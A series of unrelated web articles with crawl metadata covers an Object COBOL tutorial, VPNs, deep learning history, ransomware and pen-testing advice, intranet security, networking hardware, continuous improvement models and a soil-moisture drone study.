The Stopwatch class inherits all the class methods of Base, and its instances inherit all the instance methods of Base. This means that Stopwatch responds to all the messages given in the Base public interface as well as its own. Inheritance is explained in more detail in the tutorial Inheritance.
The Base class is part of the class library supplied with Object COBOL. If you want to look at the Base public interface, it is in your on-line Object COBOL Class Library Reference.
You can now move on to the next session, which uses Animator to show you message sending.
In this section you will create instances of the Stopwatch class, and send messages to the instances, using the supplied program, timer.cbl.
Program timer.cbl is not an Object COBOL class; it is a piece of procedural code which uses Object COBOL objects. To communicate with the objects timer.cbl uses the following Object COBOL syntax:
Declares the classes used by the programs, and links them to their filenames.
Declares a variable to hold object handles.
Sends a message to an object.
You will now animate timer to see some simple object behavior. The code demonstrates the following points:
To animate timer:
This compiles timer.cbl and stopwtch.cbl.
Animator starts with the statement below tag T010 is highlighted ready for execution.
invoke StopWatch "new" ...).
This sends the "new" message to the Stopwatch class, which creates an instance of itself, returning an object handle to it in wsStopWatch1.
wsStopwatch1with the Animator Query function.
This data item is declared with usage
which is a new COBOL datatype introduced for Object COBOL programming.
It now holds a handle (a four byte reference) to the object you have
When programming in Object COBOL, you use the object handle as an address to send messages to the object. You can pass object handles between different programs or objects as parameters, in effect enabling you to pass an object between different parts of an application.
invoke wsStopWatch1 "start").
The stopwatch starts timing.
The shell script you just ran did not compile Stopwatch for animation, so you won't see the Stopwatch code executing. In this tutorial we are concentrating on how to use objects, rather than on how to construct them.
invoke Stopwatch "new"...).
This creates a new instance of the Stopwatch class, and puts
the object handle into
wsStopwatch2. Each of the
two stopwatches you created has the same behavior, but contains different
invoke Stopwatch "howMany").
"howMany" is a class method which enables you to query the class data of Stopwatch. Use the Animator to query the value of wsCount. It contains 2, the number of instances created so far.
invoke wsStopwatch2 "start").
The second stopwatch starts running.
invoke wsStopwatch1 "getTimeFormatted"...).
You are now querying the time the first stopwatch has been running, and it returns the time which has elapsed since you started it. The other statements display the value on the console. Press F2=view to see the console, press any key to return to the Animator view.
invoke wsStopwatch1 "stop").
The stopwatches stop running.
This code fetches the elapsed time between the "start" and "stop" messages for each stopwatch.
invoke wsStopwatch1 "finalize"...).
The "finalize" method destroys an object, deallocating the memory it uses. The "finalize" method always returns a null object handle, which you can use (as it has been here) to set the object reference which held the handle to null.
You must always "finalize" objects when you have finished with them, to avoid wasting system resources.
This completes the tutorial on creating objects and sending messages. You have seen:
At this point you might be thinking that there is nothing special about objects, and you could have done exactly the same thing using a few subroutines. This is true, but think about what this would involve.
First you need to define a data structure for recording the start, stop and elapsed time for a stopwatch. Then timer1.cbl needs to declare this structure for each stopwatch it is going to use. When you want to start timing, you call the start subroutine, passing it one of these structures as a parameter. Similarly when you want to stop, or get the elapsed time.
Should you decide to alter the implementation of the stopwatch subroutines, you probably also need to change every place where you have declared stopwatch data.
Compare this with the situation using objects. You declare an object reference for each stopwatch, and having declared it, you simply send it messages to start, stop or give the elapsed time. You can alter the implementation as much as you want, providing you keep the interface for the messages the same.
All the implementation details are hidden from you, and each stopwatch you declare encapsulates its data and implementation into a single entity. The code for any client of a stopwatch is kept very simple, enabling you to concentrate on what you want to do with it, rather than on how to use it.
Copyright © 1999 MERANT International Limited. All rights reserved.
This document and the proprietary marks and names used herein are protected by international law.
|Object COBOL Tutorials (UNIX)||Writing a Class Program Tutorial (UNIX)|
|
<urn:uuid:d7534b0f-0ea3-45ab-9c13-a2d6e0df4506>
|
CC-MAIN-2022-40
|
https://www.microfocus.com/documentation/object-cobol/oc41books/opobmu.htm
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335304.71/warc/CC-MAIN-20220929034214-20220929064214-00057.warc.gz
|
en
| 0.88451 | 1,682 | 3.84375 | 4 |
Pointing to national security concerns, President Trump’s recent executive order threatens to ban TikTok if it’s not sold by the Chinese-owned company. Although Microsoft, Twitter, and now Oracle have expressed interest in acquiring the wildly popular social media app, the future of TikTok is at the moment unclear.
Amidst the uncertainty, teens everywhere are suddenly googling the letters “VPN.” Why? Among other key features, VPNs offer location masking. Although we don’t know how the proposed ban would be enforced, in theory a VPN could allow users to access the app even from within the United States.
When you use a VPN (Virtual Private Network), your internet connection is rerouted through a private server. With the VPN acting as an intermediary, your IP address (your computer’s unique ID) is masked, protecting your identity. Any personal data you send while connected is encrypted, transmitted as an unreadable code. In this way, your ISP (Internet Service Provider) is not able to see what websites you visit, what apps you use, or any of the data you send or receive.
One of the primary uses for a VPN is staying secure on an unsecure connection, like when browsing the internet on the WiFi at airports, cafés, and hotels. Without one, a motivated, tech-savvy person who’s connected to the same public network as you could use basic hacking techniques to view your browsing activity and intercept your data. This includes any sites that you visit or any information you submit online, like your username and password combinations.
How a VPN helps: A VPN encrypts all your unencrypted internet activity, from web surfing to VoIP calls, blocking potential hacks.
As it currently stands, internet service providers like Verizon and AT&T have complete access to all of your browsing history. They collect personal data and may even hand it over to advertisers, the government, or other third parties. More on that here. They are able to do so because your internet activity is connected to your device’s unique IP address.
How a VPN helps: VPNs hide your IP address and encrypt all the data you send or receive so the ISP can no longer see what websites you’re visiting or searches you’re making.
By changing your IP address, a VPN makes it appear to content providers that you are browsing in another region, allowing you to access content that may not be available in your current location. You should check the terms of service to understand what’s permitted by your streaming service and be mindful of any country-specific penalties.
How a VPN helps: Dashlane’s VPN lets you choose your server location from 20+ countries, so you can access what you want, wherever you are.
|
<urn:uuid:9d5acff9-c371-4c7e-88a6-5681b79582b2>
|
CC-MAIN-2022-40
|
https://blog.dashlane.com/vpn-security-benefits/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00257.warc.gz
|
en
| 0.918721 | 580 | 2.84375 | 3 |
History of Deep Learning: Deep Learning has dramatically improved the state-of-the-art in different machine learning tasks such as machine translation, speech recognition, visual object detection and many other domains such as drug discovery and genomics (LeCun, et al., 2015).
Copyright by www.medium.com
In addition to that, researchers are extending capabilities of deep learning beyond these traditional tasks such that Osaka et al. use recurrent neural networks to denoise speech signals, Gupta et al. use autoencoders to discover patterns in gene expressions, Gatys et al. use a generative adversarial network to generate images, Wang et al. use deep learning to allow sentiment analysis from multiple modalities simultaneously (Wang & Raj, 2017).
According to the Artificial Index 2021 report, peer-reviewed AI publications are growing exponentially. (Zhang, et al., 2021).
However, one must understand how deep learning has evolved over the years and formed the current models. The history of machine learning goes back to 300 BC, Aristotle and it is seen as starting point by Associationism (Wang & Raj, 2017).
As seen in Table 1, the progress in AI has stalled around the 60s and 70s. And there were some applications of machine learning such as machine translation which were not successful at all, especially US Navy-funded machine translation study from Russian to English. Minsky and Pappert also proved that Rosenblatt’s perceptron was only capable of solving linearly separable problems, even though they knew multiple layers could solve that, there was no algorithm at that time to train the network. Today that algorithm is known as back-propagation.
In 1973, the Lighthill report was published which gave a very pessimistic prognosis for many core aspects of the field such as “In no part of the field have the discoveries made so far produced the major impact that was then promised” (Lighthill, 1973). After this report, many funding resources were cut and a quiet period began which is known as the first AI winter. […]
Read more: www.medium.com
|
<urn:uuid:2dbed5a6-ae07-4a0d-a09f-652bff31a0a6>
|
CC-MAIN-2022-40
|
https://swisscognitive.ch/2021/10/26/history-of-deep-learning/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335491.4/warc/CC-MAIN-20220930145518-20220930175518-00257.warc.gz
|
en
| 0.969892 | 435 | 3.359375 | 3 |
Ransomware hacks on gaming computers
If you pay attention to the news, there is a good chance you have heard about ransomware recently. Ransomware—a type of malware that malicious actors use to extort money from victims they attack—is a type of cyberattack that is growing in frequency and is affecting a wider and wider range of individuals and businesses. When ransomware attacks happen, cybercriminals gain access to computer networks and essentially hold them hostage, blocking access to data and devices until victims have paid the attackers a certain sum of money. Ransomware received particular attention in the U.S. last year when attackers unleashed a ransomware attack on the Colonial Pipeline—the pipeline that delivers fuel to nearly half of the Atlantic Coast—resulting in fuel shortages and the inability to access gas across the Eastern United States.
If you are a gamer—and not a business—you still should not overlook the threat of ransomware. While ransomware attacks frequently target businesses from whom bad actors know they can get a large sum of money, they can also attack individual devices and prohibit access to your data or PC until you can meet the ransom they are demanding. If you are serious about gaming, you most likely have made a large investment in your gaming setup—purchasing things from PCs to screens to gaming software and more. So, you'll want to protect this investment to make sure you don't lose any of it to a ransomware attack that you are not prepared for.
Gamers who are wondering: is my PC safe from ransomware? Read on. Learn more about what ransomware, how common attacks are, how you get it, how you can protect your device, and much more. Understanding ransomware and being prepared for a potential attack is the best way to ensure you don't lose any of your hardware or information to malicious hackers who use it.
What is ransomware?
Ransomware is a type of malware used in cyberattacks that encrypts files on a device, rendering those files inaccessible and unusable. Then, to decrypt the files for victims, the bad actors who launched the attack demand payment from victims—and threaten to keep files inaccessible if the ransom is not paid and leak or sell the information in the files if their demands are not met. Ransomware software is constantly evolving, and the programs used to target weaknesses in networks and launch attacks can look different, depending on who is doing the attack, who is being attacked, where an attack is being launched from, and what new technology has been developed to take files hostage in exchange for a ransom.
Ransomware can essentially be used to target any computer that is connected to a network, especially if that computer (or network) is not properly protected with adequate security measures, and if users are not aware of how ransomware can infiltrate a computer or what they should be on the lookout for.
How common is ransomware?
Ransomware is a cyber-attack method that is undoubtedly growing in frequency. As more groups of hackers and malicious actors on the web understand how to launch a ransomware attack, an increasing number of individuals and organizations are becoming the victim of these malicious device takeovers. Statistics show that ransomware attacks are on the rise and that more people can expect to experience an attack if they don't take the proper steps to protect themselves and their devices.
Last year, there were a total of 304 million ransomware attacks worldwide. This number represents a 62% increase from the year prior, and it is the second-highest figure since 2014—with the highest number of annual attacks on record occurring in 2016 (when 638 million targets were attacked). Even the most sophisticated, secure, and technologically advanced companies have experienced ransomware attacks since the invention of malicious malware. Some of the most well-known victims of ransomware attacks include EA Games, Ubisoft, Capcom, Crytek, and CD Projekt RED.
How do you get ransomware?
If your gaming computer is connected to Wi-Fi, then it can be vulnerable to a ransomware attack. Ransomware can move through a Wi-Fi network, gaining access to all computers connected to it (whether those computers are used for business, personal browsing, or gaming). Computers that don't have adequate security measures, like antivirus protection or security software, are particularly vulnerable. Ransomware only affects computers when connected to the Internet and when the user opens a download that actually contains the malware inside it.
One of the most popular ways that a PC gets infected with ransomware is via phishing emails. These emails contain malicious attachments that infect a computer when opened or accessed. People also often get ransomware from drive-by downloading when they visit a website that has been infected by ransomware, which is then downloaded onto their computer without the user even knowing that it has happened. Other ways you may end up accessing ransomware without realizing it includes via social media and other web-based messaging apps.
Is my computer safe from ransomware? How you can protect your gaming PC.
If you want to protect the investment you've made in your gaming PC, software, and equipment, you can take some helpful steps that will ensure you minimize the risk of becoming a victim of a ransomware attack. Consider the following list when you're asking yourself: is my computer safe from ransomware? If you've taken the following steps, there is a good chance that your network and computer are properly protected.
Use security or antivirus software
First and foremost, you should make sure you use security or antivirus software on your gaming PC. Comprehensive digital security solutions protect your devices from a wide range of threats—from fileless malware to spyware and trojans and beyond.
For the best protection against ransomware for your gaming PC, consider using a security solution that includes an anti-ransomware tool. Anti-ransomware tools in security software use the cloud and behavioral analysis to detect suspicious application behavior—or, if a computer is already infected, can undo some of the malicious actions that have already started to occur.
Also, if you have other computers connected to the same network that you use for gaming, you want to make sure that those computers have adequate antivirus and security protection. Some ransomware can infect computers on the same network as other infected computers, and ransomware can use one vulnerable computer on a network as an access point to many more devices. Adequately protect all of the devices on a network to ensure that none of them end up being negatively impacted by the effects of ransomware.
Adopt safer practices
A smart way to ensure that your computer is not impacted by ransomware is to adopt safe Internet usage practices. Only visit websites you know, and trust is a good first step in avoiding ransomware via infected sites. Also, be careful when you read your emails. Phishing emails can be cleverly disguised, and if you're not paying full attention when you open them, you may inadvertently click a link or download a file that has malicious content, not realizing that it's not from the sender that you think it is from (or that the download doesn't contain the file you think it contains).
Try to avoid downloading any files that you aren't expecting or haven't asked for, and if you receive a file for download via a colleague or friend, check with them to make sure that they intended to send the download and that they can tell you what's in the file. When you're gaming, if there are in-game messaging services, try to avoid downloading any links from competitors or other game players since these links can be attempts by bad actors to infect your PC. By being vigilant when you are using the web, especially when you are gaming, you can actively use the Internet in a way that keeps you safe and minimize the chance you encounter harm when you're least expecting it.
Check file extensions before you download them
If you are planning to download a file from someone you know or a company you trust, make sure you take the extra step of checking the file extension before you complete the download. By ensuring that the download's file extension is a file that you want and can access or use on your computer, you can avoid the trouble of accidentally downloading ransomware onto your computer. Checking file extensions on downloads before you download them is an extra step in vigilance that can ultimately keep you, your devices, your information, and your network safe.
Don’t open or download content you don’t trust or recognize
At the end of the day, don't open or download any content you don't trust or recognize. It is a much safer decision to double-check with a sender about the content they've sent to see what is in the file or download before you simply download it—and make yourself vulnerable to threats like ransomware. Delaying a download or making a work or personal exchange slower in the name of safety is always a smart choice. Downloading or opening the wrong content too quickly can ultimately wreak havoc not only on your data and information but also for everyone else who is connected to the same network.
Back up your files regularly just in case
You may unexpectedly encounter ransomware or download it onto your computer. One important step you can take to minimize the harm is done (or the money you are forced to pay) is backing up your files regularly. Back up your files to the cloud or a hard drive disconnected from the network you use when you actively game. By backing up your files regularly, you have an extra copy of them—which means they will not be lost should you experience a ransomware attack and ultimately have to take steps to mitigate the effects of that attack. Restoring your computer to factory settings is often the best way to remove ransomware from your computer and make your device usable once again. And, if you've backed up your files, there is a good chance that you won't lose any of your work, downloads, or purchases—even though restoring your computer to factory settings will wipe it clean of anything you have saved or added to it since you started using it.
How do you remove ransomware from your gaming PC?
If you experience a ransomware attack on your gaming PC, you don't have to pay large sums of money to a malicious actor using the ransomware. Instead, the best option is to restore your computer to factory settings. Restoring your computer to factory settings wipes it clean and makes it usable once again since it removes the files that the bad actors have encrypted. This is why regular backups are so important: restoring your computer to factory settings allows you to start using your device again and helps you avoid having to pay large sums of money. Backups will allow you to keep copies of your most crucial files somewhere that is not your device and to add them back to your computer once factory settings have been restored and you've ensured that the ransomware is no longer affecting your device.
Once you have removed ransomware from your device, make sure you take the additional steps necessary to ensure your device is secured in the future. You will want to add a comprehensive antivirus and security solution to your PC, and if you want to keep yourself safe from ransomware again, make sure that the solution has a dedicated anti-ransomware tool on it. Taking steps to avoid ransomware before you get it, including browsing the web more carefully and using trusted antivirus protection software, can help you avoid the headache of getting ransomware in the first place, or let you know if you've accessed a file that may contain ransomware, so you mitigate the damage done before it even begins.
Keep your gaming PC safe from ransomware with Kaspersky Security Solutions
Gaming online can be an engaging and fun pastime—but you may also worry about the security of your devices, especially with ransomware attacks on the rise. So, if you've been thinking: is my computer safe from ransomware? You may want to consider using one of Kaspersky’s Security Solutions to ensure your devices and software are safe.
When you use a gaming PC to play games online, you want to make sure it has security solutions installed on it so that you can game stress-free. By installing antivirus and other security software, you can ensure the computer you're using, the data that's on it, and other devices connected to the same network (and their data) are safe. The most effective, reliable, and comprehensive security solutions available are the options from Kaspersky.
Kaspersky has created a wide selection of antivirus and PC protection programs that can keep your device safe, even while you connect to the web to the game. You can run Kaspersky programs in gaming mode so that your security solutions don't create lag, interrupt play, or have any effect on your gaming experience. Gaming should be an opportunity to relax, have fun, and compete with peers and friends—and you should be able to do just that without having to worry about ransomware unexpectedly impacting your experience and rendering your equipment unusable.
|
<urn:uuid:3c28d791-eded-4834-960b-345a9c18ccb7>
|
CC-MAIN-2022-40
|
https://me-en.kaspersky.com/resource-center/threats/gaming-ransomware
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00257.warc.gz
|
en
| 0.949279 | 2,614 | 2.734375 | 3 |
Wireless networks are standard in just about every home or corporate building. Because Wi-Fi access is so ubiquitous with the Internet experience, just about everyone knows what a router is because they have them in their homes. Wireless access points, however, are a term not everyone is familiar with and it’s important to understand the difference between the two. In some instances, you may need wireless access points to satisfy your networking needs, or a router, or both, so let’s take a look at what the differences are.
What Are Routers?
Just about anyone who has used Wi-Fi has interacted with a router, whether they realized it or not. Essentially, they’re used to route packets between multiple networks. Consumer routers usually have two network interfaces: LAN and WAN. LAN (local area network) connects to the WAN (wide area network) and essentially distributes the service you’re receiving. Routers are fantastic for homes or small businesses, where you need to give Wi-Fi signal to a number of computers and devices simultaneously.
What Are Wireless Access Points?
Wireless access points provide devices with connectivity to a router, which is then able to access a local network or the Internet. This is a practical solution in instances where connection via physical cables may be difficult or impractical. Think of it this way: letters aren’t delivered directly from a postman to the addressee—instead, the parcel is delivered to a postal service, which then routes it to the appropriate portion of the postal system that is capable of delivery. Wireless access points often used to extend Wi-Fi range within larger buildings that can’t otherwise feasibly have their network in all of those hard to reach areas where power may be unavailable or the construction of the building may cause difficulties. Access points can also be powered via ethernet cables, allowing for installation in remote spots that are difficult to supply Internet access to.
Which is Right For You?
Either way, you’re going to be connecting to a router—it’s just a question or whether you’re doing it physically, with a cable, or wirelessly, with an access point. This is all situational, but wireless access systems are typically deployed in widespread facilities, when several buildings need access, college campuses where you have disparate users who may need Internet access outside or in cafeterias, or even just offices where wireless connectivity makes it easy for guests to get online during meetings.
Get in Touch with FiberPlus
FiberPlus has been providing data communication solutions for over 25 years in the Mid Atlantic Region for a number of different markets. What began as a cable installation company for Local Area Networks has grown into a leading provider of innovative technology solutions improving the way our customers communicate and keeping them secure. Our solutions now include:
- Structured Cabling (Fiberoptic, Copper and Coax for inside and outside plant networks)
- Electronic Security Systems (Access Control & CCTV Solutions)
- Wireless Access Point installations
- Public Safety DAS – Emergency Call Stations
- Audio/Video Services (Intercoms and Display Monitors)
- Support Services
- Specialty Systems
- Design/Build Services
FiberPlus promises the communities in which we serve that we will continue to expand and evolve as new technology is introduced within the telecommunications industry.
Have any questions? Interested in one of our services? Call FiberPlus today 800-394-3301, email us at [email protected], or visit our contact page. Our offices are located in the Washington, DC metro area, Richmond, VA, and Columbus, OH. In Pennsylvania, please call Pennsylvania Networks, Inc. at 814-259-3999.
|
<urn:uuid:15056732-b3ae-4c19-96ee-34cb078268d3>
|
CC-MAIN-2022-40
|
https://www.fiberplusinc.com/helpful-information/whats-the-difference-between-wireless-access-points-and-routers/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337516.13/warc/CC-MAIN-20221004152839-20221004182839-00257.warc.gz
|
en
| 0.936495 | 772 | 3.15625 | 3 |
The Continuous Improvement Model is a tactical method that’s implemented across a company to provide a roadmap for improving its practices.
Different models exist such as Lean and Six Sigma and can vary in terms of structure, but the goal is to purge your enterprise of excess and improve the quality and efficiency of work processes.
Six Sigma is the more popular and visibly recognized version of Lean in these business practices. Six Sigma is a Continuous Improvement Model that centers on enhancing consistency and getting rid of variability.
Six Sigma seeks to attain stable and predictable process results. This is achieved by having a clear roadmap and procedures in place that can be measured to attain improvement for a company’s future.
As a meticulous and data-driven approach, Six Sigma focuses on quality over quantity by being ensconced in statistical analysis.
To succeed, Six Sigma depends on a strong group of individuals who bring specific expertise to see the Continuous Improvement Model through. These experts come prepared and have extensive credentials and certifications to help with the process.
Kaizen originates from the Japanese word meaning “change for the better.” Kaizen is another form of the Continuous Improvement Model that works to better the process of ebbs and flows within an organization.
The difference between Six Sigma and Kaizen is that Six Sigma is more organized, and Kaizen is less rigid.
At the heart of Kaizen is a conviction and mentality that allows organizations to eradicate waste, improve work quality, and inspire employees to bring their A-game in the improvement of their daily work.
Also, Six Sigma has clearly defined roles where Kaizen has no defined chain of command in the Continuous Improvement Model.
With Flow Kaizen, the structure is geared towards the process and flow of information and materials. Additionally, Process Kaizen is the improvement of individual and team processes. Both Flow and Process Kaizen use disciplined research whereby changes can be adjusted along the way.
Companies using the Continuous Improvement Model can adapt as they work in the marketplace via experimenting. The result is Flow and Process Kaizen allow for improvements to continue and to be monitored.
Theory of constraints
This theory uses a model to contain problems that slow down the process and works to improve the system. This happens when you reduce one constraint and then identify the next one.
Total quality management (TQM)
TQM focuses on employee engagement, organized thinking, and other concepts to improve business from the ground up.
Continuous Improvement Model: examples
The Continuous Improvement Model doesn’t stop working once you have achieved your goals. As the term states, it aims for constant modifications, so the result is always being perfected.
1. Think tanks and ideation
Think tank’s goal is to have an innovative dialogue with employees, which can occur in different ways. By flushing out different perspectives — no idea is a bad one — a seed can be planted to grow new ideas. By implementing these strategies, companies gain better insights into future possibilities.
2. Training for employees
Training is an important part of any company’s strategic goals to align people with the latest technology and ideas.
By training employees in different areas, the Continuous Improvement Model works. A good example is when someone is out sick: by knowing the aspects of another employee’s job, someone can fill in for them while they are away.
3. Surveys and Polls
With so many platforms used today, surveys and polls have become an important part of a companies’ voice to keep track of improvements needed. Every idea matters and surveys and polls help drive this point home.
As an ongoing process model, a sound strategy is in place to improve your business. The end game is to optimize the outcome for the best results to leverage for your enterprise.
Learn how to start an organizational culture that drives results.
|
<urn:uuid:dd3b1558-4f34-490d-902b-d4c5fc207885>
|
CC-MAIN-2022-40
|
https://blog.axway.com/learning-center/digital-strategy/digital-transformation/continuous-improvement-model
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334915.59/warc/CC-MAIN-20220926175816-20220926205816-00457.warc.gz
|
en
| 0.937577 | 801 | 2.78125 | 3 |
Raising security awareness nowadays is more important than ever considering the fact that anyone who has a device connected to the internet can fall victim to malicious attacks. While it may bring certain inconveniences for individuals, business owners can lose everything when a successful security breach takes place; a damaged reputation and relationship with customers can ruin a business.
Investing in a good security specialist as well as organizing cybersecurity training courses or other educational programs for your staff is crucial as these measures increase the protection of sensitive information and the integrity of internal resources.
However, you don’t need to wait until someone tries to compromise your security to assess your protection. Instead, you can do it yourself now.
Most often penetration testing (or shortened pen-testing) is used for these purposes. The core of pen-testing lies in discovering security issues and vulnerabilities of a network, website, or application by breaching it. In a nutshell, it’s a real hacking attack with the only difference from the malicious one – you are the initiator of this attack, you receive the report with the results, and you pay to get hacked. Various ways of launching these attacks exist depending on the aim of this testing.
The most commonly used cases are blind testing when a company that performs pen-testing is not given any information apart from your website name, and double-blind testing when in addition to that your security specialists have no idea that the attack is planned. Also, the tests can be external (when only publicly available resources are targeted) and internal (simulating the attack made by an employee or having the employee’s credentials to corporate resources).
Why may you ever need this?
Here are 3 solid reasons why hacking your own network is not such a crazy idea as it may seem from the first sight.
Reason 1: To discover and oust vulnerabilities in the system
Regardless of the software you use, certain vulnerabilities still exist. According to recent security reports, almost half of web applications have serious security issues, while the medium and low-risk issues were found in more than 80% applications.
In the course of pen-testing, ethical hackers try to simulate the most common practices to gain access to your system, upload malware there, or to steal information. They use XSS attacks, MySQL injections, various PHP exploits, and other common vulnerabilities to upload malware and ransomware on working machines. It’s also possible to simulate the DDoS attack to see whether your network can sustain it.
As a result of pen-testing aimed at discovering the weak system points, you will be able also to pick up additional security solutions you may want to implement in your organization.
Reason 2: To develop security policies within your company
Unfortunately, most often the security policies within a company start after a security incident.
In case of a successful hacking event that was initiated on your end, you will end up understanding the imperfections and backdoors in your procedures, i.e restricting access to sensitive data, launching automatic regular password changes, adding additional authentication such as 2FA or OTP, and initiate logging activity of your employees inside the corporate network.
Also, it can involve updating security tokens within the system within shorter intervals, conducting a regular access audit, and implementing immediate account deactivation once an employee leaves the company.
These things are especially important as the regular means can save sensitive data from leakage. And according to the recent statistics, the number of exposed records at the beginning of 2020 due to data breaches was higher than eight billion, which is four times bigger than the beginning of any other year.
Reason 3: Check if your company is an easy target for social engineers
(Image by Varonis, © 2020 Inside Out Security)
Unfortunately, there is no ultimate protection for the social engineering attacks since humans are not machines and they cannot block the incoming threats by default. This makes people the easiest target for hacking. Modern social engineers are great manipulators and can use people’s emotions and feelings such as compassion, fear, or desire to help to gain the necessary info.
They can pretend to be a boss requiring a banking account or a customer who forgot their password, or even non-tech savvy people asking you to help them open a tutorial which masks an attempt to force you to download some malware. Even the big technology companies are suffering from these kinds of cyberattacks.
To avoid this, it’s recommended to raise the security awareness of your employees, implementing the verification procedures for customers, setting up a strict policy of internal info sharing, and make sure that employees are reporting all the suspicious situations. In addition, the regular checks involving social engineering can help to estimate the current threats and indicate the learning gaps of your employees.
Based on this information, one can see the benefit of conducting different tests and simulating external attacks (pen-testing) to check the security potential of a business, what information is the least protected and vulnerable to leakages, what flaws exist in the current procedure, and the readiness of your systems and people to counteract security threats.
The results obtained after the application of one strategy or multiple strategies will provide you with the current protection level and the chances of suffering from a given type of real attacks. They also provide the direction your company should take to improve the security, what backdoors need to be closed, and other measures to strengthen the security of your business.
If it is one of those rare cases that the test passed successfully and the security audits did not discover any potential threats, it does not mean that you made your system secure once and for good. Security is like health that requires constant monitoring and regular checkup to make sure everything is working smoothly and avoid unexpected emergencies.
Stewart Dunlop looks after content marketing at Udemy and has a passion for writing articles that users will want to read. In his free time, he likes to play football and read Stephen King.
|
<urn:uuid:bc032fa3-8ac2-4890-9634-b4aa2f50f963>
|
CC-MAIN-2022-40
|
https://en.cloudbric.com/blog/2020/08/pen-testing-3-reasons-to-hack-your-network/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334915.59/warc/CC-MAIN-20220926175816-20220926205816-00457.warc.gz
|
en
| 0.943296 | 1,203 | 2.59375 | 3 |
Maintaining a secure and efficient intranet is essential in today’s digital age. The two go hand in hand. As more businesses become globalised and better connected to the outside world, the danger of cyber crime becomes more prevalent. Companies are combating this by instituting a strong security system within their internal networks. Intranets are used to ensure that internal and external business activities run smoothly. However, these networks also help to protect valuable customer information that outside sources can access. The risk of illegal activity occurring within an intranet is real. Therefore, companies need to implement the necessary security measures to prevent it from happening.
What is Intranet Security?
Intranets are computer networks used exclusively by a single organisation or corporation, such as a business, school, or hospital. Like the Internet, they act as a virtual public space and are used to share information. Intranets function in the same way as extranets. They are private and have extraordinary security measures. Intranets are used by employees and sometimes suppliers to access information or collaborate internally in a secure way.
Intranet security protects information, equipment, and physical property within the intranet. Security measures are implemented for all intranets; however, depending on the type of business or industry, these security measures may differ. These security measures can vary from site to site and department to department, depending on the size of the network.
The Importance Of Intranet Security
Enhanced Communication, Information Exchange, and Teamwork
The success of the intranet hinges on how effectively it is secured. Intranets are valuable business tools and abusing them can harm a company. Security is paramount for any organisation or corporation that utilises an intranet as a service component or digital platform.
Increase in Employee Productivity
Because an intranet allows its users to access various applications and files, it serves as a venue for increased employee productivity. Employees within an organisation can access information and review documents without having to attend the office or send information through email physically. It creates a virtual command centre where employees can collaborate effectively and efficiently.
Intranets employ various security measures to prevent illegal activity and protect valuable information. Intranets have been designed with security and additional measures to prevent unauthorised access. Some examples of these measures include encrypting the sent data, which is an effective way to prevent eavesdropping and hacking. Another measure involves the secure creation of virtual sandboxes for networked applications, which prevents direct access to an intranet’s servers for hackers and malicious websites.
It is Cost-Effective
Intranets are cost-effective for business because they allow companies to share valuable information and applications. It gives employees greater access to the information they need and makes it easier for company managers to communicate internally with staff. It also allows them to decide how best to utilise such information. It is a more streamlined way of working and can reduce waste.
How to Secure an Intranet
It is important to secure your intranet. Once you have implemented your security system, you need to ensure that it works effectively and efficiently, or it can become a hindrance.
The following are some steps you can take to secure your intranet:
1. Establish a Comprehensive Security Policy
Effective security requires that you establish a comprehensive security policy. This policy should be specific and contain all the relevant details regarding your company’s information, applications, equipment, and physical security measures. It should also include policies for different departments within your corporation and website users.
2. Modern User Experience
A secure intranet should also be user-friendly and personalised to the needs of your employees. For instance, it should ensure that employees can access applications and files independently when necessary. It should also provide end-to-end encryption for sensitive information.
3. Strengthen Your Log-in Protocols
Hackers always look for ways to access your intranet. A strong log-in protocol is a key component of an effective security system. Hackers will try and get into your system using various methods, such as cracking passwords or exploiting security vulnerabilities in the browser. You need to strengthen these points by using stronger character passwords and requiring multiple authentication factors whenever possible.
4. Meet Global Security Standards
You must comply with global data security standards. This ensures that your information is protected, and you meet important compliance requirements. It also demonstrates to customers, clients, and vendors that you respect their personal information and guarantees security.
5. Secure Third-party Integrations
If you use third-party applications, you need to make sure that these applications are safe and compatible with your security process. If you have chosen to use a third-party application, ensure it is antivirus-protected and constantly updated.
Intranets are a valuable asset for businesses to have. However, the success of an intranet relies on how effectively it is secured. Intranets provide employees with easy access to information and collaboration. This allows employees to be more effective in their jobs, and employers can communicate more efficiently with the staff.
As the intranets value increases, the importance of security increases as well. Once the intranet is fully secured and protected, it can serve as an even more asset and increase productivity in both business and personal lives.
An effective intranet security system is imperative for an organisation that utilises a digital platform or service component. It ensures that employees and customers have safe access to your organisation’s valuable information. It also protects your business’s data and assets as well as the reputation of your company in the marketplace.
|
<urn:uuid:e6833a1b-2213-4008-a6b2-e8519191c2cf>
|
CC-MAIN-2022-40
|
https://mitigatecyber.com/the-importance-of-intranet-security/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.43/warc/CC-MAIN-20220928020513-20220928050513-00457.warc.gz
|
en
| 0.932612 | 1,162 | 3 | 3 |
Monash University researchers have equipped a drone with microwave sensing technology to map the soil moisture of farmland.
Late last year, the team completed field experiments using optical mapping which can determine soil moisture levels in the near-surface of crop fields.
Research is now being conducted using drones fitted with passive L-Band microwave emission sensors, with flights planned that will measure P-Band waves. P-Band waves are expected to be able to measure up to 15cm into the soil unimpeded by vegetation and tillage features.
In the trials, after the drone has covered the field, data is taken from it to produce a map of ground soil moisture levels to inform the farmer on how best to irrigate an area.
“We need to produce 60 per cent more food with the same amount of land and water, and we can only achieve this by being more efficient with the water we use through irrigation,” said team leader, Professor Jeff Walker, head of civil engineering atMonash.
A Monash drone being prepared for lift-off
“We need to know how much the crop needs, how much moisture is already there and apply just the right amounts of water in the correct places to avoid wastage while keeping the crop at its peak growth,” he added.
Testing has taken place at two farms, in regional Victoria and Tasmania. One was a dairy farm using a centre pivot irrigator and the other a crop farm using a linear shift irrigator.
The aim is to fully optimise the use of water on farms, a shortage of which can have enormous human and financial consequences. Agriculture uses 50 to 70 per cent of the water consumed in Australia each year.
